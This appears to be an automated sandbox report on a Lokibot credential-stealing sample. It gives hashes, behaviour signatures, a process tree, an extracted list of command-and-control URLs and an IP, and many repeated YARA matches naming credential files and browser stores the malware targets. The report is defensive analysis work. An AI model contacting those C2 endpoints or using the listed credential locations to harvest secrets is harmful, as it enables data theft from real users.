Edit tour

Windows Analysis Report
ypdTgfE0o8

Overview

General Information

Sample Name:	ypdTgfE0o8 (renamed file extension from none to exe)
Analysis ID:	620790
MD5:	d2ce3b2a5f3efb1fcede96304e57a531
SHA1:	d74be8fe0be4ec13340dad9c0fdeb653c9c8b90e
SHA256:	e0a4948a58829f4ecd9e6fb9b28e127a6827bd8761ded085d2069a248f6f5462
Tags:	32exetrojan
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

ypdTgfE0o8.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\ypdTgfE0o8.exe" MD5: D2CE3B2A5F3EFB1FCEDE96304E57A531)

cbgsujmwws.exe (PID: 6240 cmdline: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny MD5: F9E42C92E371CEDC22C78E2900418651)

cbgsujmwws.exe (PID: 492 cmdline: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny MD5: F9E42C92E371CEDC22C78E2900418651)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.133.1.20/oluwa/five/fre.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: cbgsujmwws.exe PID: 6240	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: cbgsujmwws.exe PID: 6240	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: cbgsujmwws.exe PID: 492	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: cbgsujmwws.exe PID: 492	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.cbgsujmwws.exe.400000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.9.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.9.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.9.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.9.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.9.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.cbgsujmwws.exe.9f0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.cbgsujmwws.exe.9f0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
1.2.cbgsujmwws.exe.9f0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.7.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.7.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.7.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.7.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.7.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.8.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.8.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.8.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.cbgsujmwws.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.cbgsujmwws.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.cbgsujmwws.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.cbgsujmwws.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.2.cbgsujmwws.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.cbgsujmwws.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.6.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.6.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.6.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.6.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.6.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.cbgsujmwws.exe.9f0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.6.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.6.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.5.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.5.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.9.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.9.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.0.cbgsujmwws.exe.400000.9.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.0.cbgsujmwws.exe.400000.9.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.0.cbgsujmwws.exe.400000.9.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.0.cbgsujmwws.exe.400000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.cbgsujmwws.exe.400000.7.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.0.cbgsujmwws.exe.400000.7.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
